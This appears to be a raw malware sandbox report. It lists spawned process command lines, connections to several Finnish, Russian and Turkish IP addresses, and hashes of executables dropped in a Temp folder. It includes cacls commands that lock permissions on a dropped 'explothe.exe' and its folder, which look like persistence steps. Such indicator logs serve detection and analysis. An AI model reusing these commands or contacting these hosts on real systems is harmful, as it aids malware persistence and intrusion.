"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10B.exe

C:\Users\Admin\AppData\Local\Temp\10B.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 254.1.248.8.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp

Files

memory/2208-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2208-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3180-2-0x0000000007630000-0x0000000007646000-memory.dmp

memory/2208-4-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B611.exe

MD5 d295489cc7f06e3229a08715c3d73814
SHA1 0fd98d23821878adace03323948a2c2718222ffd
SHA256 b3b7fcec7c3996c4124f5bdba514b32124a8ab446ac00dea435b60b1f7e88769
SHA512 314d280da49ebd98c99217551f5262037866f73c11a7477c729364ede03dafd3a5615671925b2826354d5e8a5dcb3dea73f38519ff5bed642c1428224461d451

C:\Users\Admin\AppData\Local\Temp\B611.exe

MD5 d295489cc7f06e3229a08715c3d73814
SHA1 0fd98d23821878adace03323948a2c2718222ffd
SHA256 b3b7fcec7c3996c4124f5bdba514b32124a8ab446ac00dea435b60b1f7e88769
SHA512 314d280da49ebd98c99217551f5262037866f73c11a7477c729364ede03dafd3a5615671925b2826354d5e8a5dcb3dea73f38519ff5bed642c1428224461d451

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe

MD5 dd4c372db3be58e4d24842acc2dbfbc3
SHA1 d6e4743b75bea2b721c72880a4c127e003644b66
SHA256 f56c58adfd5437d8b506a20e1d68d70be912b5c6966c39bbec9176fa7f1ea525
SHA512 e1b2602de975c130742f24c46a23d555ff98bce0736507008194ab0824c5838f62546fcb2e5646f5d31cae74e4aa63f0b1a0cdbf7c770ea8f0dfe86f94a94736

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe

MD5 dd4c372db3be58e4d24842acc2dbfbc3
SHA1 d6e4743b75bea2b721c72880a4c127e003644b66
SHA256 f56c58adfd5437d8b506a20e1d68d70be912b5c6966c39bbec9176fa7f1ea525
SHA512 e1b2602de975c130742f24c46a23d555ff98bce0736507008194ab0824c5838f62546fcb2e5646f5d31cae74e4aa63f0b1a0cdbf7c770ea8f0dfe86f94a94736

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe

MD5 e1367690e04fa399fc946b2fe702bab4
SHA1 058ea9fb9eef1090122de02162a02f246d6458b7
SHA256 43ea5ce8fba611a2a318a3ea1a72b967b8c22f043750417f3ce96d19bc7e9def
SHA512 8d711cc38a078d565cb2b274b6d02f3a46b7308581c097815aa150463d4afdcb05a63682f2879f47408ed2d64b56c2d07eca544d68439de55931b57bfc76cf82

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe

MD5 e1367690e04fa399fc946b2fe702bab4
SHA1 058ea9fb9eef1090122de02162a02f246d6458b7
SHA256 43ea5ce8fba611a2a318a3ea1a72b967b8c22f043750417f3ce96d19bc7e9def
SHA512 8d711cc38a078d565cb2b274b6d02f3a46b7308581c097815aa150463d4afdcb05a63682f2879f47408ed2d64b56c2d07eca544d68439de55931b57bfc76cf82

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe

MD5 229460cb3bfdf00106201da676025b70
SHA1 f1563e54acb60599642afbd29f285fc5fa110832
SHA256 2a511f540ed48dab195ee1cef4af0c43402e820018599738619aa216f60481d5
SHA512 906fdd66b699af5c7ea50a55c5e3e0d34d8e8af0cfd621f3c3529e17530b5cd20036b0d98f901104bed7fefc85d18eadc01423773da56e90d78de9b6958e6260

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe

MD5 229460cb3bfdf00106201da676025b70
SHA1 f1563e54acb60599642afbd29f285fc5fa110832
SHA256 2a511f540ed48dab195ee1cef4af0c43402e820018599738619aa216f60481d5
SHA512 906fdd66b699af5c7ea50a55c5e3e0d34d8e8af0cfd621f3c3529e17530b5cd20036b0d98f901104bed7fefc85d18eadc01423773da56e90d78de9b6958e6260

C:\Users\Admin\AppData\Local\Temp\B883.exe

MD5 0fdc61c9202e2d8f7865ea1f055d328e
SHA1 bb2ec64387e9a675ac7f97236e54ef6b4e9481e0
SHA256 650a8a6512a47f0224509df2a3431891504f0b796ec26f9f454710d0386fcfee
SHA512 79cb141673b4ed50a0fbfa7aa96bc39a62d5ef72d5809085ab6e798cc5a1ae0c467939ac29fcb148a259f1ef32288dfd8b3fc08ff14dba390c20ca0577e099d2

C:\Users\Admin\AppData\Local\Temp\B883.exe

MD5 0fdc61c9202e2d8f7865ea1f055d328e
SHA1 bb2ec64387e9a675ac7f97236e54ef6b4e9481e0
SHA256 650a8a6512a47f0224509df2a3431891504f0b796ec26f9f454710d0386fcfee
SHA512 79cb141673b4ed50a0fbfa7aa96bc39a62d5ef72d5809085ab6e798cc5a1ae0c467939ac29fcb148a259f1ef32288dfd8b3fc08ff14dba390c20ca0577e099d2

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

MD5 ca64d1eb04ed701f6dba83c59e2d9c74
SHA1 5d0dc63a595be906c61cbf883d6f5fd77f43cfe0
SHA256 7ec2847220fe2b2179da8490559a74bf3684499dca65f95ee4a9761cd28cffc6
SHA512 5dd62405a78159df8f7b3ad93312636108a98c002706f96b1c7b5c9ac4362886e186a261ba8e268c261be2b9a689149c50d440cd7d93d2b282e3b22a9c1a9e56

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

MD5 ca64d1eb04ed701f6dba83c59e2d9c74
SHA1 5d0dc63a595be906c61cbf883d6f5fd77f43cfe0
SHA256 7ec2847220fe2b2179da8490559a74bf3684499dca65f95ee4a9761cd28cffc6
SHA512 5dd62405a78159df8f7b3ad93312636108a98c002706f96b1c7b5c9ac4362886e186a261ba8e268c261be2b9a689149c50d440cd7d93d2b282e3b22a9c1a9e56

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe

MD5 a1ff303dc93f70bf1375da6e507e57a4
SHA1 49b21e743d4447c206be7a7cf8b334c052521be6
SHA256 07176cbd72fd196cdf52f4475454a77f7d57678b0e0eebe3223242e294af17cb
SHA512 f3c9c041cc842c700eadc5e17e942f1a543d07887ffdd5895148855e006aea10071397b347e6ca637bf2067810ae3245cd75a23296ba135bfa0233b8ba0ef70c

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe

MD5 a1ff303dc93f70bf1375da6e507e57a4
SHA1 49b21e743d4447c206be7a7cf8b334c052521be6
SHA256 07176cbd72fd196cdf52f4475454a77f7d57678b0e0eebe3223242e294af17cb
SHA512 f3c9c041cc842c700eadc5e17e942f1a543d07887ffdd5895148855e006aea10071397b347e6ca637bf2067810ae3245cd75a23296ba135bfa0233b8ba0ef70c

C:\Users\Admin\AppData\Local\Temp\B96F.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\B96F.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\B96F.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

memory/1588-59-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1588-60-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1588-58-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1588-61-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4720-63-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BC5E.exe

MD5 f4162995f2f22651e9b42938e71047d3
SHA1 03b5192eeaffac0376303f7b30eea43a5291374f
SHA256 c3132cfa55991968855a0cf18ae5a21ce54c9b1b5f7c6cc0bc1bf35d09601cae
SHA512 b30e3aa2d4651e6ec2af1e3e9481e9ce520a4938fdfee82004f9db6f8b1c2e71c9031eb009c2c31cfed62f660127f76ffeb65682170b36032b0969bbc2a638da

memory/4720-70-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BC5E.exe

MD5 f4162995f2f22651e9b42938e71047d3
SHA1 03b5192eeaffac0376303f7b30eea43a5291374f
SHA256 c3132cfa55991968855a0cf18ae5a21ce54c9b1b5f7c6cc0bc1bf35d09601cae
SHA512 b30e3aa2d4651e6ec2af1e3e9481e9ce520a4938fdfee82004f9db6f8b1c2e71c9031eb009c2c31cfed62f660127f76ffeb65682170b36032b0969bbc2a638da

memory/4720-64-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BDA7.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\BDA7.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

memory/2240-75-0x0000000000830000-0x000000000083A000-memory.dmp

memory/1588-76-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2240-77-0x00007FFBD80D0000-0x00007FFBD8B91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BFF9.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\BFF9.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/2884-84-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2BY150Kr.exe

MD5 a5c03e1930922b2d7e2a805ade98b4f6
SHA1 e9c0858f113b9bdb692c22302b8706db997edf64
SHA256 802a6976ed48f18b8dc51a20e6857e88c6da2e6e35c86f72cde9561de413e982
SHA512 68b196584a7f28a9db8f1a7228dab642295a283b085cdcbdad685e0537dd0c963a6761ad35d05bb3faaceb027ce54b9b1f60016a8b36239a291578ce42e6322b

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2BY150Kr.exe

MD5 a5c03e1930922b2d7e2a805ade98b4f6
SHA1 e9c0858f113b9bdb692c22302b8706db997edf64
SHA256 802a6976ed48f18b8dc51a20e6857e88c6da2e6e35c86f72cde9561de413e982
SHA512 68b196584a7f28a9db8f1a7228dab642295a283b085cdcbdad685e0537dd0c963a6761ad35d05bb3faaceb027ce54b9b1f60016a8b36239a291578ce42e6322b

C:\Users\Admin\AppData\Local\Temp\BAA5.tmp\BAA6.tmp\BAA7.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/2884-94-0x0000000071E10000-0x00000000725C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/2884-98-0x0000000008280000-0x0000000008824000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/2760-99-0x0000000071E10000-0x00000000725C0000-memory.dmp

memory/2760-89-0x0000000000B40000-0x0000000000B7E000-memory.dmp

memory/2760-100-0x00000000078E0000-0x0000000007972000-memory.dmp

memory/2884-102-0x0000000007FD0000-0x0000000007FE0000-memory.dmp

memory/2884-101-0x0000000007E10000-0x0000000007E1A000-memory.dmp

memory/2760-103-0x00000000078A0000-0x00000000078B0000-memory.dmp

memory/2760-104-0x0000000008980000-0x0000000008F98000-memory.dmp

memory/2760-105-0x0000000007C70000-0x0000000007D7A000-memory.dmp

memory/2884-106-0x0000000008000000-0x0000000008012000-memory.dmp

memory/2760-107-0x0000000007C00000-0x0000000007C3C000-memory.dmp

memory/2760-108-0x0000000008360000-0x00000000083AC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6351be8b63227413881e5dfb033459cc
SHA1 f24489be1e693dc22d6aac7edd692833c623d502
SHA256 e24cda01850900bdb3a4ae5f590a76565664d7689026c146eb96bcd197dac88b
SHA512 66e249488a2f9aa020834f3deca7e4662574dcab0cbb684f21f295f46d71b11f9494b075288189d9df29e4f3414d4b86c27bf8823005d400a5946d7b477f0aef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

\??\pipe\LOCAL\crashpad_2588_GHMTBNGIJUZMSOQI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

\??\pipe\LOCAL\crashpad_1268_NSCHMNAZRKQWKPMY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 44a2d2fd21f7d5aafc5c8023b22cfb68
SHA1 86f55209fe7734d2d294b08b5fc5de2f27a75d5e
SHA256 5452a507a9b58c3f3c64d4546efbef36865bda3e3a27281427c390d118a58dec
SHA512 1bb10cbc781adbcc26dbc18d5078d58da399d0ea7ffd25fa832c212bfaeca4e7f97399069f5c9c1eafc3c9c12114424cb7876a1b04cd12e9f64c88fbff8dbecd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9d9ed68a591b4870799de4e60b0a9f54
SHA1 7c951f3721eabf3805f6bc5794c4191018a2a587
SHA256 0350df3ea6d3d88f137ab727731f853bf5a8cf0de0c4ad7bda68bf6feedb214b
SHA512 fb3530183fbb4cf9f39e228965bc1a22d0e2f658026f15d2c9f848c10ee9161a9eae75cfaa3f475dda0d55b83a5afa4d51c20692b1b00b7f6d9a62beef1b58aa

memory/2240-233-0x00007FFBD80D0000-0x00007FFBD8B91000-memory.dmp

memory/2884-234-0x0000000071E10000-0x00000000725C0000-memory.dmp

memory/2240-257-0x00007FFBD80D0000-0x00007FFBD8B91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/2760-264-0x0000000071E10000-0x00000000725C0000-memory.dmp

memory/2884-269-0x0000000007FD0000-0x0000000007FE0000-memory.dmp

memory/2760-270-0x00000000078A0000-0x00000000078B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ef71500c0a84543072b9703a4a3a6822
SHA1 4bb82d3ba924ac0f2a74698eb46d3363a96a7b9d
SHA256 7acbb812a81af89963ef4b4a83739f8ad6d696515b3946f8f2534c246e3d2ff2
SHA512 bbb8012adb1fe862de623067c016a97e37935c57df302ade9feb7d398fcb643db46df034280427b2b0841919c33502389f8d2eefc3bab9ce60b3c7e9644636dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 44a2d2fd21f7d5aafc5c8023b22cfb68
SHA1 86f55209fe7734d2d294b08b5fc5de2f27a75d5e
SHA256 5452a507a9b58c3f3c64d4546efbef36865bda3e3a27281427c390d118a58dec
SHA512 1bb10cbc781adbcc26dbc18d5078d58da399d0ea7ffd25fa832c212bfaeca4e7f97399069f5c9c1eafc3c9c12114424cb7876a1b04cd12e9f64c88fbff8dbecd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 500b2802f91e0b9c8d353025d7986024
SHA1 1af331fcc07790fa8ce943e81467fe2a487c9a55
SHA256 182b794c8ca9d9b7dac8df081d41fd9fece854214b0ebf82fa44477d72948371
SHA512 92d16795ce70defae0564653cfd8bfcbdb4cc75159ba9e76bf209063f7c076eed700fc3feeb6aea38f99c47fc9c7209cbdc92e0f2e755c257e9f1540d7739e28

C:\Users\Admin\AppData\Local\Temp\10B.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
